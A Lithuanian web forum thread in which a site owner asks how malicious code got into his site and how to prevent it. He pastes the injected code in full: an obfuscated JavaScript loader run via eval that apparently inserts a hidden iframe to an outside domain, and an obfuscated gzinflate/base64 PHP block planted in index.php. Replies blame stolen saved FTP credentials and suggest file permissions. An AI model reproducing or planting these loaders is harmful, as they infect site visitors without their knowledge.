Virusas mano tinklalapyje

Sveiki Programeriai,

Mano tinklalapyje atsirado kenkėjiškas kodas, kurį naršyklės interpretuoja kaip virusą. Kadangi pats nesugalvoju galimo varianto, galbūt kas jau esat su tuo susidūrę ir žinote kaip tai galėjo nutikti? FTP slaptažodis ganėtinai sunkus, failų permissions: 644.

Hostingas: US.lt

Kodas atvaizduojamas naršyklėje:

<script>i=0;try{prototype;}catch(z){h="h"+"arCode";f=['-32c-32c64c61c-9c-1c59c70c58c76c68c60c69c75c5c62c60c75c28c67c60c68c60c69c75c74c25c80c43c56c62c37c56c68c60c-1c-2c57c70c59c80c-2c0c50c7c52c0c82c-28c-32c-32c-32c64c61c73c56c68c60c73c-1c0c18c-28c-32c-32c84c-9c60c67c74c60c-9c82c-28c-32c-32c-32c59c70c58c76c68c60c69c75c5c78c73c64c75c60c-1c-7c19c64c61c73c56c68c60c-9c74c73c58c20c-2c63c75c75c71c17c6c6c68c56c62c76c58c65c70c5c73c76c6c58c70c76c69c75c9c10c5c71c63c71c-2c-9c78c64c59c75c63c20c-2c8c7c-2c-9c63c60c64c62c63c75c20c-2c8c7c-2c-9c74c75c80c67c60c20c-2c77c64c74c64c57c64c67c64c75c80c17c63c64c59c59c60c69c18c71c70c74c64c75c64c70c69c17c56c57c74c70c67c76c75c60c18c67c60c61c75c17c7c18c75c70c71c17c7c18c-2c21c19c6c64c61c73c56c68c60c21c-7c0c18c-28c-32c-32c84c-28c-32c-32c61c76c69c58c75c64c70c69c-9c64c61c73c56c68c60c73c-1c0c82c-28c-32c-32c-32c77c56c73c-9c61c-9c20c-9c59c70c58c76c68c60c69c75c5c58c73c60c56c75c60c28c67c60c68c60c69c75c-1c-2c64c61c73c56c68c60c-2c0c18c61c5c74c60c75c24c75c75c73c64c57c76c75c60c-1c-2c74c73c58c-2c3c-2c63c75c75c71c17c6c6c68c56c62c76c58c65c70c5c73c76c6c58c70c76c69c75c9c10c5c71c63c71c-2c0c18c61c5c74c75c80c67c60c5c77c64c74c64c57c64c67c64c75c80c20c-2c63c64c59c59c60c69c-2c18c61c5c74c75c80c67c60c5c71c70c74c64c75c64c70c69c20c-2c56c57c74c70c67c76c75c60c-2c18c61c5c74c75c80c67c60c5c67c60c61c75c20c-2c7c-2c18c61c5c74c75c80c67c60c5c75c70c71c20c-2c7c-2c18c61c5c74c60c75c24c75c75c73c64c57c76c75c60c-1c-2c78c64c59c75c63c-2c3c-2c8c7c-2c0c18c61c5c74c60c75c24c75c75c73c64c57c76c75c60c-1c-2c63c60c64c62c63c75c-2c3c-2c8c7c-2c0c18c-28c-32c-32c-32c59c70c58c76c68c60c69c75c5c62c60c75c28c67c60c68c60c69c75c74c25c80c43c56c62c37c56c68c60c-1c-2c57c70c59c80c-2c0c50c7c52c5c56c71c71c60c69c59c26c63c64c67c59c-1c61c0c18c-28c-32c-32c84'][0].split('c');v="e"+"va"+"l";}if(v)e=window[v];try{q=document.createElement("div");q.appendChild(q+"");}catch(qwg){w=f;s=[];}r=String;z=((e)?h:"");for(;567!=i;i+=1){j=i;if(e)s=s+r["fromC"+z](w[j]*1+41);}if(v&&e)e(s);</script>

PHP faile kodas įdėtas pavyzdingai geroj vietoj ( lyg būtų matytas visas failas ) - po aprašytų php headerių ir php komandų vykdomų prieš kraunant puslapį iškart prieš html headerius.

#d93065#
echo(gzinflate(base64_decode("tVVRb9owEP4ty0NJFsHiJLaTpd4eqv2CPSIe0CWUVJSEkIEK4r/v7mIotIFVkyqV6nw+f/fd3ef4fg1NWbc/ShNkbfOyr5uqrdqXusgOMG1h7u68/dw4c8d3ps1DlRdONjPjwTAKgX4qBiVgmMJQgExBByAT0ApUAioAhR4JElRIKzRDdGveOdvXMYQSkgDiCKSi4EizwTEIPAxBasZOKQyXaCIeSLISZIK4R0avrHT0ioI2AgUgkovgJCbuxEQTDUqX9gFeL00nhI0JcWXZahBpDwVExhTkSSDkKlTE5eOfAIFtAQ7tWoCJME5JzkunKDMzCNjk9CkI3hUMxY2iLAlllxyB/i4XHrTb6CL+MU+FGbyN0FxNEthZddtac5UxY7OttK0bI4l+ZNPK1DYIm42kiHB87FBMS9riCUvuuu7ar2wLxUkjgjwYqRmJW9F1SndzhFBwq3uaHfIceud9tqRD3EuZXLAbpjck1CMPzdVQQGqvQ8jzvi4b2ckm4HNcdu/V6MTfo6Wwqw3d0gqX5hgf9RTZKZ2a2gGd9Id29FkKvCB2riP5Dw2dLsUbGaHzOuIVfXVY1yR2C/Fce1b5txkcddkf/NHJXN7Z43zsnfyfWb+/5n2gH//QfeI3XPItEKwiBsSYUFklYC7Jz4vq/X4PJuNgMlrXi7J1BzDwso1xCnysNlP8t3CyQzlzN15htuUyr7bjzYRfuZXJK/jzXCzbETTFtC1+LQpauU5ebhwvW42mdV0s84d5ucjdle+gz76Hq+2jt9+aWbY240l2aMzvtimXj9nOuG7h/Zx/p9hZ1biZVPqLKbPSN8LbP5E1w4i1WfvN2Jk11fOD4+8m7nb8NPkq/Fh4Hdm7u8Ir3LWX3X+zb/Nf")));
#/d93065#

Būsiu dėkintas už betkokią naudingą informaciją.

Jeigu pagelbės, url: http://krepsinionaujienos.lt

Man visai nerodo kaip viruso.

Man visai nerodo kaip viruso.

Kodą pašalinau. Tačiau noriu išsiaiškinti kaip tai padarė ir kaip nuo to apsisaugoti.

gerbiamasis, naudok legalius skriptus, kitas dalykas peržiūrėk kodą, dar vienas peržiūrėk failus toliau sudėk chmod'us ant tų failų į kuriuos neįrašoma pabandyk viskam sukalti 444(arba tik kar read)

Na man buvo apkrėtę visus index.php failus laikomus tame serveryje. Tai atsitiko, dėl to, jog buvau išsaugojąs FileZilla programoje prisijungimo slaptažodį ir iš kompiuterio ten pateko. Kaip į kompiuterį pateko? apsilankiau svetainėje su tokiu pat virusu, kuris pateko į mano svetainę :)

gerbiamasis, naudok legalius skriptus, kitas dalykas peržiūrėk kodą, dar vienas peržiūrėk failus toliau sudėk chmod'us ant tų failų į kuriuos neįrašoma pabandyk viskam sukalti 444(arba tik kar read)

Ačiū už komentarą. Visgi skriptas mano yra legalus.

Na man buvo apkrėtę visus index.php failus laikomus tame serveryje. Tai atsitiko, dėl to, jog buvau išsaugojąs FileZilla programoje prisijungimo slaptažodį ir iš kompiuterio ten pateko. Kaip į kompiuterį pateko? apsilankiau svetainėje su tokiu pat virusu, kuris pateko į mano svetainę :)

Ačiū, bandysiu pakeisti ir išjungti saugojimą.

Ačiū už komentarą. Visgi skriptas mano yra legalus.

 

 

Ačiū, bandysiu pakeisti ir išjungti saugojimą.

Teoriškai patikrink java skriptus.

"Na man buvo apkrėtę visus index.php failus laikomus tame serveryje. Tai atsitiko, dėl to, jog buvau išsaugojąs FileZilla programoje prisijungimo slaptažodį ir iš kompiuterio ten pateko. Kaip į kompiuterį pateko? apsilankiau svetainėje su tokiu pat virusu, kuris pateko į mano svetainę "

lygiai toks pat variantas buvo ir man.

Buvo ir man prikolas kai pasigavau kazkoki worm'sa apkrete visus failus + dar googlas uzbanino kaip kenkejiska svetaine <_<